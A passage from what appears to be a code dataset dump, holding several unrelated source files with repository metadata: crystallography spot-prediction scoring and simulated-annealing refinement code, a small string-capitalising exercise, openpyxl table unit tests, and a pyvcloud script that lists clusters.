cpp_polydata = []
for idx in range(0,len(map_relative_poly),5):
cpp_polydata.append( ([ map_relative_poly[idx+0],
map_relative_poly[idx+1],
map_relative_poly[idx+2],
map_relative_poly[idx+3],
map_relative_poly[idx+4]
],{}) )
self.red_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linx (antialiasing removed)
cpp_polydata, color="red", name="<red_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
poly = cpp_results.spot_rectregions((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.),1.0)
map_relative_poly = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(poly)
cpp_polydata = []
for idx in range(0,len(map_relative_poly),5):
cpp_polydata.append( ([ map_relative_poly[idx+0],
map_relative_poly[idx+1],
map_relative_poly[idx+2],
map_relative_poly[idx+3],
map_relative_poly[idx+4]
],{}) )
self.pink_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linx (antialiasing removed)
cpp_polydata, color="pink", name="<pink_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
print("Entering C++ pixels")
cpp_results.enclosed_pixels_and_margin_pixels()
print("Done with C++ pixels")
internal = cpp_results.enclosed_px
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(internal)
self.yellow_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="yellow", name="<yellow_layer>",
radius=1.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
internal = cpp_results.margin_px
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(internal)
self.green_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="green", name="<green_layer>",
radius=1.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(
cpp_results.selected_predictions())
self.blue_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="blue", name="<blue_layer>",
radius=2.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
# Now figure out how to implement the scoring function. Do this in picture fast low coordinates
# FIRST Set: spot bodypixels:
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
self.adapt = AnnAdaptor(data=body_pixel_reference,dim=2,k=1)
N_bodypix = body_pixel_reference.size()//2
# second set: predict box
enclosed_pixels = cpp_results.enclosed_px
N_enclosed = enclosed_pixels.size()
N_enclosed_body_pixels = 0
query = flex.double()
for pixel in enclosed_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
import math
for p in range(N_enclosed):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_enclosed_body_pixels += 1
# third set: marginal
marginal_pixels = cpp_results.margin_px
margin_distances = cpp_results.margin_distances
N_marginal = marginal_pixels.size()
N_marginal_body_pixels = 0
marginal_body = 0
marginal_nonbody = 0
query = flex.double()
for pixel in marginal_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
for p in range(N_marginal):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_marginal_body_pixels += 1
marginal_body += 0.5 + 0.5 * math.cos (-math.pi * margin_distances[p]) #taking MARGIN==1
else:
marginal_nonbody += 0.5 + 0.5 * math.cos (math.pi * margin_distances[p])
print("marginal body/nonbody",marginal_body, marginal_nonbody)
print("There are %d body pixels of which %d are enclosed and %d are marginal leaving %d remote"%(
N_bodypix,N_enclosed_body_pixels,N_marginal_body_pixels,
N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels))
print("There are %d enclosed pixels of which %d are body, %d are nonbody"%(
N_enclosed,N_enclosed_body_pixels,N_enclosed-N_enclosed_body_pixels))
print("There are %d marginal pixels of which %d are body, %d are nonbody"%(
N_marginal,N_marginal_body_pixels,N_marginal-N_marginal_body_pixels))
Score = 0
# the scoring function to account for these spots:
# pink -- spot body pixels inside predict box = 0
# red -- spot body pixels > 2 pxl away from predict box = 1
Score += N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels
# gradation -- body pixels within the marginal zone
Score += marginal_body + marginal_nonbody
# blank -- nonbody pixels outside of 2 pixel margin = 0
# yellow -- nonbody pixels inside predict box = 1
Score += N_enclosed-N_enclosed_body_pixels
# gradation -- in between zone, within margin
print("The score is",Score)
def use_case_3_score_only(self,frame,half_deg,wave_HI, wave_LO):
from rstbx.bandpass import use_case_bp3,parameters_bp3
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = half_deg*pi/180.
parameters = parameters_bp3(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
packed_tophat=col((wave_HI,wave_LO,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
cpp_results = use_case_bp3(parameters=parameters)
cpp_results.set_active_areas(
frame.pyslip.tiles.raw_image.get_tile_manager(frame.inherited_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True))
cpp_results.picture_fast_slow()
poly = cpp_results.spot_rectangles((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.))
poly = cpp_results.spot_rectregions((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.),1.0)
cpp_results.enclosed_pixels_and_margin_pixels()
# Now figure out how to implement the scoring function. Do this in picture fast low coordinates
# FIRST Set: spot bodypixels:
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
self.adapt = AnnAdaptor(data=body_pixel_reference,dim=2,k=1)
N_bodypix = body_pixel_reference.size()//2
# second set: predict box
enclosed_pixels = cpp_results.enclosed_px
N_enclosed = enclosed_pixels.size()
N_enclosed_body_pixels = 0
query = flex.double()
for pixel in enclosed_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
import math
for p in range(N_enclosed):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_enclosed_body_pixels += 1
# third set: marginal
marginal_pixels = cpp_results.margin_px
margin_distances = cpp_results.margin_distances
WGT = 50.
N_marginal = marginal_pixels.size()
N_marginal_body_pixels = 0
marginal_body = 0
marginal_nonbody = 0
query = flex.double()
for pixel in marginal_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
for p in range(N_marginal):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_marginal_body_pixels += 1
marginal_body += 0.5 + 0.5 * math.cos (-math.pi * margin_distances[p]) #taking MARGIN==1
else:
marginal_nonbody += 0.5 + 0.5 * math.cos (math.pi * margin_distances[p])
marginal_body *=WGT
if False:
print("marginal body/nonbody",marginal_body, marginal_nonbody)
print("There are %d body pixels of which %d are enclosed and %d are marginal leaving %d remote"%(
N_bodypix,N_enclosed_body_pixels,N_marginal_body_pixels,
N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels))
print("There are %d enclosed pixels of which %d are body, %d are nonbody"%(
N_enclosed,N_enclosed_body_pixels,N_enclosed-N_enclosed_body_pixels))
print("There are %d marginal pixels of which %d are body, %d are nonbody"%(
N_marginal,N_marginal_body_pixels,N_marginal-N_marginal_body_pixels))
Score = 0
# the scoring function to account for these spots:
# pink -- spot body pixels inside predict box = 0
# red -- spot body pixels > 2 pxl away from predict box = 1
Score += WGT*(N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels)
# gradation -- body pixels within the marginal zone
Score += marginal_body + marginal_nonbody
# blank -- nonbody pixels outside of 2 pixel margin = 0
# yellow -- nonbody pixels inside predict box = 1
Score += N_enclosed-N_enclosed_body_pixels
# gradation -- in between zone, within margin
return Score
def use_case_3_grid_refine(self,frame):
reserve_orientation = self.inputai.getOrientation()
wrapbp3 = wrapper_of_use_case_bp3( raw_image = frame.pyslip.tiles.raw_image,
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = frame.inherited_params)
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = self.inputai.wavelength*0.9975,
wave_LO = self.inputai.wavelength*1.0025,
half_mosaicity_deg = 0.1)
#print "score...",wrapbp3.score_only()
wave_HI = self.inputai.wavelength*0.9975
wave_LO = self.inputai.wavelength*1.0025
low_score = None
for half_deg in [0.06, 0.08, 0.10, 0.12, 0.14]:
for bandpass in [0.004, 0.005, 0.006, 0.007, 0.008]:
for mean_multiplier in [0.9990, 1.0000, 1.0010, 1.0020]:
# A1=0.;A2=0.;A3=0.
for A1 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
for A2 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
for A3 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
ori = reserve_orientation.rotate_thru((1,0,0),A1).rotate_thru((0,1,0),A2).rotate_thru((0,0,1),A3)
self.inputai.setOrientation(ori)
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
#score = self.use_case_3_score_only(
# frame,half_deg,HI,LO)
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = half_deg)
score = wrapbp3.score_only()
if low_score == None or score < low_score:
low_score = score
best_params = (half_deg,HI,LO,ori,A1,A2,A3)
print("wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(HI,LO,100.*(LO-HI)/LO,half_deg,score))
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],low_score))
print("rotation angles",best_params[4],best_params[5],best_params[6])
return best_params
def use_case_3_simulated_annealing(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
SA = SALight()
# Half mosaicity in degrees
# Mid-wavelength adjustment factor
# Bandpass fractional full width
# adjustment angle in degrees
# adjustment angle in degrees
# adjustment angle in degrees
# starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f"
def set_variables_from_sa_x(x):
ori = reserve_orientation.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 600
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6])
return best_params
def use_case_3_simulated_annealing_7(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
lowest_cell = max(reserve_orientation.unit_cell().parameters()[0:3])
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
SA = SALight()
# Half mosaicity in degrees
# Mid-wavelength adjustment factor
# Bandpass fractional full width
# adjustment angle in degrees
# adjustment angle in degrees
# adjustment angle in degrees
# starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0,lowest_cell*10.])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05,lowest_cell*2.])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f, Domain %6.0f"
def set_variables_from_sa_x(x):
ori = reserve_orientation.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0],
domain_size = x[6])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5],x[6])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 600
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
if test_params[6]<lowest_cell: continue # crystal domain can't be lower than 1 unit cell
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6],"Domain",best_params[7])
return best_params
def use_case_3_simulated_annealing_9(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
lowest_cell = max(reserve_orientation.unit_cell().parameters()[0:3])
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
from cctbx.uctbx import unit_cell
from rstbx.symmetry.constraints import AGconvert
SA = SALight()
# Half mosaicity in degrees
# Mid-wavelength adjustment factor
# Bandpass fractional full width
# adjustment angle in degrees
# adjustment angle in degrees
# adjustment angle in degrees
# starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0,lowest_cell*10.,1.00,1.00])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05,lowest_cell*2.,0.0002,0.0002])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f, Domain %6.0f, a,c %6.4f %6.4f"
def set_variables_from_sa_x(x):
# ------ Go through hoops just to reset a,c without altering the angles
converter = AGconvert()
converter.forward(reserve_orientation)
model = converter.initial_model()
old_uc = unit_cell(metrical_matrix=model[3:9])
params = list(old_uc.parameters())
params[0] *= x[7] # change a
params[1] *= x[7] # change b for tetragonal, hexagonal a==b
params[2] *= x[8] # change c
new_uc = unit_cell(parameters=params)
converter.validate_and_setG(new_uc.metrical_matrix())
newori = converter.back_as_orientation()
# ------ finished with unit cell lengths
ori = newori.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0],
domain_size = x[6])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5],x[6],x[7],x[8])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 900
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
if test_params[6]<lowest_cell: continue # crystal domain can't be lower than 1 unit cell
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6],"Domain",best_params[7])
return best_params
try:
from cxi_user import user_slip_callback
slip_callbacks.slip_callback = user_slip_callback
except Exception:
pass # no user-defined behavior
| 45.888307
| 259
| 0.681924
|
676802ef0c43452a3a2b929df283691fc6b7bddb
| 133
|
py
|
Python
|
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | null | null | null |
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | null | null | null |
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | 1
|
2021-11-19T23:56:45.000Z
|
2021-11-19T23:56:45.000Z
|
test = "pepito flores"
def Capitalizador(input):
output = input.title()
print(output)
return output
Capitalizador(test)
| 16.625
| 26
| 0.699248
|
6bc93b108d25604454d798e0ab22dd8550577223
| 6,241
|
py
|
Python
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 12
|
2019-08-07T16:48:21.000Z
|
2021-12-13T02:47:22.000Z
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 19
|
2019-12-29T05:07:36.000Z
|
2021-04-22T18:09:49.000Z
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 1
|
2020-05-26T20:33:10.000Z
|
2020-05-26T20:33:10.000Z
|
from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
import pytest
from io import BytesIO
from zipfile import ZipFile
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def TableColumn():
from ..table import TableColumn
return TableColumn
class TestTableColumn:
def test_ctor(self, TableColumn):
col = TableColumn(id=1, name="Column1")
xml = tostring(col.to_tree())
expected = """
<tableColumn id="1" name="Column1"/>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableColumn):
src = """
<tableColumn id="1" name="Column1"/>
"""
node = fromstring(src)
col = TableColumn.from_tree(node)
assert col == TableColumn(id=1, name="Column1")
@pytest.fixture
def Table():
from ..table import Table
return Table
class TestTable:
def test_ctor(self, Table, TableColumn):
table = Table(displayName="A_Sample_Table", ref="A1:D5")
xml = tostring(table.to_tree())
expected = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
displayName="A_Sample_Table" headerRowCount="1" name="A_Sample_Table" id="1" ref="A1:D5">
</table>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_columns(self, Table, TableColumn):
table = Table(displayName="A_Sample_Table", ref="A1:D5")
table._initialise_columns()
xml = tostring(table.to_tree())
expected = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
displayName="A_Sample_Table" headerRowCount="1" name="A_Sample_Table" id="1" ref="A1:D5">
<autoFilter ref="A1:D5" />
<tableColumns count="4">
<tableColumn id="1" name="Column1" />
<tableColumn id="2" name="Column2" />
<tableColumn id="3" name="Column3" />
<tableColumn id="4" name="Column4" />
</tableColumns>
</table>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Table):
src = """
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
id="1" name="Table1" displayName="Table1" ref="A1:AA27">
</table>
"""
node = fromstring(src)
table = Table.from_tree(node)
assert table == Table(displayName="Table1", name="Table1",
ref="A1:AA27")
def test_path(self, Table):
table = Table(displayName="Table1", ref="A1:M6")
assert table.path == "/xl/tables/table1.xml"
def test_write(self, Table):
out = BytesIO()
archive = ZipFile(out, "w")
table = Table(displayName="Table1", ref="B1:L10")
table._write(archive)
assert "xl/tables/table1.xml" in archive.namelist()
@pytest.fixture
def TableFormula():
from ..table import TableFormula
return TableFormula
class TestTableFormula:
def test_ctor(self, TableFormula):
formula = TableFormula()
formula.text = "=A1*4"
xml = tostring(formula.to_tree())
expected = """
<tableFormula>=A1*4</tableFormula>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableFormula):
src = """
<tableFormula>=A1*4</tableFormula>
"""
node = fromstring(src)
formula = TableFormula.from_tree(node)
assert formula.text == "=A1*4"
@pytest.fixture
def TableStyleInfo():
from ..table import TableStyleInfo
return TableStyleInfo
class TestTableInfo:
def test_ctor(self, TableStyleInfo):
info = TableStyleInfo(name="TableStyleMedium12")
xml = tostring(info.to_tree())
expected = """
<tableStyleInfo name="TableStyleMedium12" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TableStyleInfo):
src = """
<tableStyleInfo name="TableStyleLight1" showRowStripes="1" />
"""
node = fromstring(src)
info = TableStyleInfo.from_tree(node)
assert info == TableStyleInfo(name="TableStyleLight1", showRowStripes=True)
@pytest.fixture
def XMLColumnProps():
from ..table import XMLColumnProps
return XMLColumnProps
class TestXMLColumnPr:
def test_ctor(self, XMLColumnProps):
col = XMLColumnProps(mapId="1", xpath="/xml/foo/element", xmlDataType="string")
xml = tostring(col.to_tree())
expected = """
<xmlColumnPr mapId="1" xpath="/xml/foo/element" xmlDataType="string"/>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, XMLColumnProps):
src = """
<xmlColumnPr mapId="1" xpath="/xml/foo/element" xmlDataType="string"/>
"""
node = fromstring(src)
col = XMLColumnProps.from_tree(node)
assert col == XMLColumnProps(mapId="1", xpath="/xml/foo/element", xmlDataType="string")
@pytest.fixture
def TablePartList():
from ..table import TablePartList
return TablePartList
from ..related import Related
class TestTablePartList:
def test_ctor(self, TablePartList):
tables = TablePartList()
tables.append(Related(id="rId1"))
xml = tostring(tables.to_tree())
expected = """
<tableParts count="1" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<tablePart r:id="rId1" />
</tableParts>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, TablePartList):
src = """
<tableParts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<tablePart r:id="rId1" />
<tablePart r:id="rId2" />
</tableParts>
"""
node = fromstring(src)
tables = TablePartList.from_tree(node)
assert len(tables.tablePart) == 2
| 28.368182
| 108
| 0.614164
|
df1e70add294121dc8b8c60f39917c2d84a65a90
| 1,298
|
py
|
Python
|
examples/list_clusters.py
|
h-medjahed/pyvcloud
|
696243a7f418987936f1ddce94dfeceaa9fd04d2
|
[
"Apache-2.0"
] | null | null | null |
examples/list_clusters.py
|
h-medjahed/pyvcloud
|
696243a7f418987936f1ddce94dfeceaa9fd04d2
|
[
"Apache-2.0"
] | 3
|
2017-08-24T07:32:12.000Z
|
2018-12-03T16:46:09.000Z
|
examples/list_clusters.py
|
useitcloud/pyvcloud
|
d3ed57b43d36d942edced2ee02cf6367d6826bb8
|
[
"Apache-2.0"
] | 1
|
2018-07-10T13:56:58.000Z
|
2018-07-10T13:56:58.000Z
|
#! /usr/bin/env python
import json
import time, datetime, os, sys
from pyvcloud.vcloudair import VCA
from pyvcloud.cluster import Cluster
from pyvcloud.helper.CommonUtils import convertPythonObjToStr
def print_vca(vca):
if vca:
print 'vca token: ', vca.token
if vca.vcloud_session:
print 'vcloud session token: ', vca.vcloud_session.token
print 'org name: ', vca.vcloud_session.org
print 'org url: ', vca.vcloud_session.org_url
print 'organization: ', vca.vcloud_session.organization
else:
print 'vca vcloud session: ', vca.vcloud_session
else:
print 'vca: ', vca
host='vcd.cpsbu.eng.vmware.com'
username = 'administrator'
password = os.environ['PASSWORD']
org = 'System'
org_url = 'https://%s/cloud' % host
verify = False
log = True
version = '27.0'
vca = VCA(host=host, username=username, service_type='standalone', version=version, verify=verify, log=log)
result = vca.login(password=password, org=org, org_url=org_url)
print_vca(vca)
cse = Cluster(session=vca.vcloud_session, verify=verify, log=log)
clusters = cse.get_clusters()
print('clusters found: %s' % len(clusters))
for cluster in clusters:
print('cluster %s' % cluster['name'])
| 30.904762
| 107
| 0.66641
|
878c524e0eb4153cdd7604e03bebde9e5c465d9d
| 936
|
py
|
Python
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 150
|
2015-01-16T12:24:13.000Z
|
